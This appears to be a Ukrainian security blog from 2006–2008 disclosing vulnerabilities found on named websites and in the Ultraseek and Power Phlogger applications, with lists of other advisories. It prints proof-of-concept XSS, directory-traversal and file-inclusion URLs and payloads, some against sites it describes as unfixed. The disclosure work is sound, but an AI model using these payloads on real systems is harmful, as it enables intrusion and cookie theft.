Websecurity - Веб безпека

13.09.2007

У квітні, 03.04.2007, я знайшов Cross-Site Scripting уразливості на проекті www.ufs.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.02.2008

XSS:

• alert(document.cookie)
• alert(document.cookie)

Дані уразливості вже виправлені. Але виправлені не повністю, тому при невеликій модифікації коду знову працюють.

XSS:

• alert(document.cookie) (Mozilla)
• alert(document.cookie) (IE)
• alert(document.cookie) (IE)
• цікавий (IE)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах wp-footnotes, st_newsletter та Simple Forum. Для котрих нещодавно з’явилися експлоіти. wp-footnotes - це плагін для встановлення приміток, st_newsletter - це плагін для створення розсилок, Simple Forum - це плагін для створення форума.

• Wordpress Pluging wp-footnotes 2.2 (admin_panel.php) Multiple Vulnerabilites (деталі)
• Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability (деталі)
• Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• ActiveCalendar 1.2.0, Multiple vulnerabilities (деталі)
• pickle download local file (деталі)
• Vulnerabilities in Simple one-file gallery (деталі)
• xtcommerce local file include (деталі)
• shopkitplus local file include (деталі)
• PHP remote file inclusion vulnerability in Christian Schneider CS-Gallery (деталі)
• SQL injection vulnerability in Coppermine Photo Gallery (CPG) 1.3.x (деталі)
• WFTPD Pro Server <= 3.25 SITE ADMN Remote Denial of Service Exploit (деталі)
• BolinTech DreamFTP (USER) Remote Buffer Overflow PoC (деталі)
• Інклюдинг локальних файлів в 3editor (деталі)
• Vulnerability in sNews (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in Ezboxx Portal System (деталі)
• SQL injection vulnerability in Ezboxx Portal System (деталі)
• PHP-інклюдинг в PowerClan (деталі)
• Міжсайтовий скриптінг в @Mail (деталі)

16.12.2006

У жовтні, 08.10.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://onlinechange.com (обмінник веб грошей). Про що найближчим часом сповіщу адміністрацію проекту.

Про уразливості в обмінниках веб грошей я вже згадував раніше, зокрема про уразливості на www.wm-exchanger.com.

Детальна інформація про уразливість з’явиться пізніше.

14.02.2008

XSS (Persistent):

POST запит на сторінці https://onlinechange.com/exchange/ clearing_request.asp?from=USD%20e-gold&to=RUR&type=ST:

</textarea><script>alert(document.cookie)</script>В полі: Реквизиты счета получателя.

Дана уразливість вже виправлена.

В даній добірці уразливості в веб додатках:

• CedStat v1.31 XSS (деталі)
• Information leak in Pearson Education PowerSchool 4.3.6 (деталі)
• Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability (деталі)
• Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability (деталі)
• FCRing <= 1.31 (fcring.php s_fuss) Remote File Include Vulnerability (деталі)
• Phpwebgallery-1.4.1, Multiple Cross Site Scripting (деталі)
• Photostand_1.2.0 Multiple Cross Site Scripting (деталі)
• BolinTech DreamFTP (USER) Remote Buffer Overflow PoC (деталі)
• Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC (деталі)
• CSRF-атака в MKPortal (деталі)
• Міжсайтовий скриптінг в SugarCRM Sugar Open Source (деталі)
• PHP-інклюдинг в Valdersoft Shopping Cart (деталі)
• Vulnerability in Ezboxx Portal System (деталі)
• PHP remote file inclusion vulnerability in Naig (деталі)
• Дві уразливості в Soumu Workflow (деталі)

Як я нещодавно писав, 12.11.2006, я знайшов ряд уразливостей на websense.com (де раніше використовувався движок Ultraseek). І як я сьогодні перевірив на сайті виробника Verity Ultraseek, дані уразливості мають місце в движку Ultraseek.

Я підтвердив наявність раніше знайдених Cross-Site Scripting, Directory Traversal та Local File Inclusion уразливостей (окрім Full path disclosure) в Ultraseek, а також знайшов чимало нових уразливостей. Про що найближчим часом повідомлю розробникам даного локального пошуковця.

XSS: Remote HTML Include / Remote XSS Include:

http://site/highlight/index.html?url=http://websecurity.com.ua/webtools/xss_r.html&fterm=test&la=en&charset=utf-8&search=../query.html%3Fcharset%3Dutf-8%26qt%3Dtest

Directory Traversal:

http://site/help/syntax.html?la=/../../index

http://site/help/searchtips.html?la=/../../index

http://site/help/refine.html?la=/../../index

http://site/help/special.html?la=/../../index

http://site/help/boolean.html?la=/../../index

http://site/help/meta.html?la=/../../index

Local File Inclusion:

http://site/help/syntax.html?la=/../query

http://site/help/searchtips.html?la=/../query

http://site/help/refine.html?la=/../query

http://site/help/special.html?la=/../query

http://site/help/boolean.html?la=/../query

http://site/help/meta.html?la=/../query

06.09.2007

У березні, 27.03.2007, я знайшов Cross-Site Scripting уразливість на http://www.infosecuritymoscow.com - сайті виставки INFOSECURITY MOSCOW. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.02.2008

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection (деталі)
• SQL Injection Vulnerability in Beehive Forum Software (деталі)
• Cross-site scripting (XSS) vulnerability in Citrix NetScaler 8.0 (деталі)
• Citrix NetScaler Web Management Cookie Weakness (деталі)
• Meganoide’s news v1.1.1 < = RFi Vulnerabilities (деталі)
• Dem_trac acces to log file wihtout authentification (деталі)
• Turuncu Portal v1.0 == SQL Injection Vulnerability (деталі)
• PHP-інклюдинг в Newxooper PHP (деталі)
• TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit (деталі)
• Міжсайтовий скриптінг в opentaps (деталі)
• oftpd: Denial of Service (деталі)
• Виконання довільних команд в TYPO3 (деталі)
• JV2 Folder Gallery 3.0 (download.php) Remote File Disclosure Exploit (деталі)
• Розкриття даних в Mono (деталі)
• Cross-site scripting (XSS) vulnerability in Fastilo 2.0 and Open Solution Quick.Cart 2.0 (деталі)

Ще 18.08.2006 я виявив Cross-Site Scripting уразливості в Power Phlogger, котрий використовує одна українська компанія як основу для власного рахівника. Про що їм у вересні 2006 повідомив і вони виправили уразливості. Хоча і дуже нечемно забули подякувати мені за мою роботу по підвищенню безпеки їх сайтів - не подякували за жоден з моїх листів про численні уразливості на їхніх сайтах (як на сайті з Power Phlogger, так й інших).

XSS:

POST запит на сторінці http://site/dspLogs.php:

"><script>alert(document.cookie)</script>В полях: Host, Referrer, Agent Information, res, colo, online, mp.

Як я перевірив учора, 09.02.2008, дані уразливості були виправлені лише частково - лише в POST запиті, а в GET XSS залишилися. Також окрім Cross-Site Scripting, я виявив Information disclosure уразливості в Power Phlogger. Про що найближчим часом сповіщу розробників веб додатку.

XSS:

http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information disclosure:

На сторінці http://site/index.php (як й інших сторінках додатку) виводиться важлива інформація про систему (версії PHP та MySQL, як і версія веб сервера з його банера) в мета-тегах. Що приводить до витоку важливої інформації.

<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це перша частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

04.09.2007

У березні, 23.03.2007, я знайшов Cross-Site Scripting уразливість на проекті http://infostream.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

10.02.2008

XSS:

• alert(document.cookie)

Дана уразливість вже виправлена.